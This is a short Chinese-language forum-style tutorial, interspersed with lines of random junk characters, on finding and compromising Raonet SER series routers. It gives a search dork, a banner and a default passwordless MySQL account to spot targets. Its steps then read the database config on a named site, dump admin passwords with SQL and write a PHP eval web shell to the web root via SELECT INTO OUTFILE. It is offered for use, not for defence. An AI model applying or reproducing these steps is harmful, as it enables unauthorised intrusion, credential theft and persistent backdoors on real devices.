寻找存在漏洞的路由器方法:
7 d# y8 V, m- U# r' r T' y% G7 [
6 Q6 Q0 \0 Z7 c5 @' h* g( u/ s1:google搜索'Raonet Subscriber Ethernet Router'
2 s% v% ?/ c; I# j/ ?
/ ]! J" s" W$ I a2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001
4 a/ n N; @' |: m4 G/ f7 Q8 B
- A! q4 b+ |& E/ h3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。
p G9 Q1 ]% P5 l7 |4 A
( i7 z. h5 d" O. g8 ]6 V//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......
3 M0 k/ U5 Q# G6 @6 M* D! b$ Q( n" T# E# N/ L5 @: I7 d
6 z! B. W5 i8 ^/ X' p: e
W: p5 d# K3 I0 S+ [! d! R
入侵步骤:
& g. B* w( e% ~4 a2 Q- E8 H/ Q4 L3 R v2 |* C
1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php K# b% m! C8 ^; m0 J. [
5 W3 d/ C* w, k8 `" e2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc5 M. o) E" Z2 Q- S
3:得到密码后连接,查看GUI管理密码:
1 g$ a/ k0 e3 v, a4 |( buse ser_500
: X j4 p$ B2 w' o/ k* _select id,passwd from user;
9 A$ `4 I s0 c$ n- s) \1 B4:通过数据库写入webshell,执行命令:
6 Z/ T5 f. m% V* K& ^; }& E) @use mysql;, s2 C% A3 O; j! }
create table ok(cmd TEXT);
5 Z/ [0 w7 O2 m& ]2 @( q2 D2 R: iinsert into ok values("<?php @eval($_POST[cmd])?>");
/ r; E( @5 _2 r3 N1 jselect * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";- s9 F$ `9 r2 E
drop table ok;
6 _9 y% _" d( y
& ~8 Y- F$ Q+ D; ?8 g8 I( `5:连接后门shell.php
1 X# D h/ ]! y5 c$ G; Q
# N4 N' A% f: Y/ \! Y/ n6. 搞定!
6 s- A5 R/ @. k6 A' v7 ?; g4 f# T; z4 s: f- r7 e; M. X7 z
|